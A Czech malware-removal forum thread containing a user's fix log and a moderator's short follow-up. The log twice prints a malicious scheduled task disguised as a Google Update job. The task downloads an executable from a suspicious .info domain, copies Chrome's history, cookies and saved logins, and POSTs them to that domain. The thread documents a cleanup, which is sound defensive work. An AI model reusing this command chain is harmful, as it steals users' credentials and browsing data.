Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.92\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.102\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.82\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67}\InprocServer32 -> C:\Users\PC\AppData\Local\Google\Update\1.3.36.72\psuser_64.dll => No File
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&FORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC
SearchScopes: HKU\S-1-5-21-1878501408-2484808434-785971923-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp//www.bing.com/search?q={searchTerms}&src ... ORM=IE8SRC

EmptyTemp:
End
*****************

Processes closed successfully.
HKLM\SOFTWARE\Policies\Google => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C093763-EE42-49CF-8891-F189A4AB542C}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C093763-EE42-49CF-8891-F189A4AB542C}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{326F35B1-9030-43D1-BD0D-5DBD49CECAFF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{326F35B1-9030-43D1-BD0D-5DBD49CECAFF}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION => Error: No automatic fix found for this entry.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{74344F07-42C6-4622-9312-152A6B0AECFF}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74344F07-42C6-4622-9312-152A6B0AECFF}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FF6375C1-1AC9-466C-80D7-F1443D3F6986}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FF6375C1-1AC9-466C-80D7-F1443D3F6986}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
HKLM\System\CurrentControlSet\Services\tmlwf => removed successfully
tmlwf => service removed successfully
HKLM\System\CurrentControlSet\Services\tmwfp => removed successfully
tmwfp => service removed successfully
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA" => not found
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore" => not found
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{8B480070-D37D-4090-A063-7A429F849652} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{BE5C2E39-090F-46A2-AFAA-47540743B4FE} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{CA8FA699-91CD-412F-9D13-9B1222F4370E} => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000_Classes\CLSID\{DEDF773D-E27B-485E-8E7D-85C5B0EB5A67} => removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully
"HKU\S-1-5-21-1878501408-2484808434-785971923-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => removed successfully

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 39858649 B
Java, Flash, Steam htmlcache => 75 B
Windows/system/drivers => 353557217 B
Edge => 0 B
Chrome => 8015508 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 83565 B
systemprofile32 => 149793 B
LocalService => 216501 B
NetworkService => 1692181 B
PC => 4805834241 B

RecycleBin => 1908484100 B
EmptyTemp: => 6.6 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 21:10:35 ====

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118199
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: neplatné certifikaty v prohližečích

#9 Příspěvek od Rudy »

Smazáno. Nastala nějaká změna?
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

Odpovědět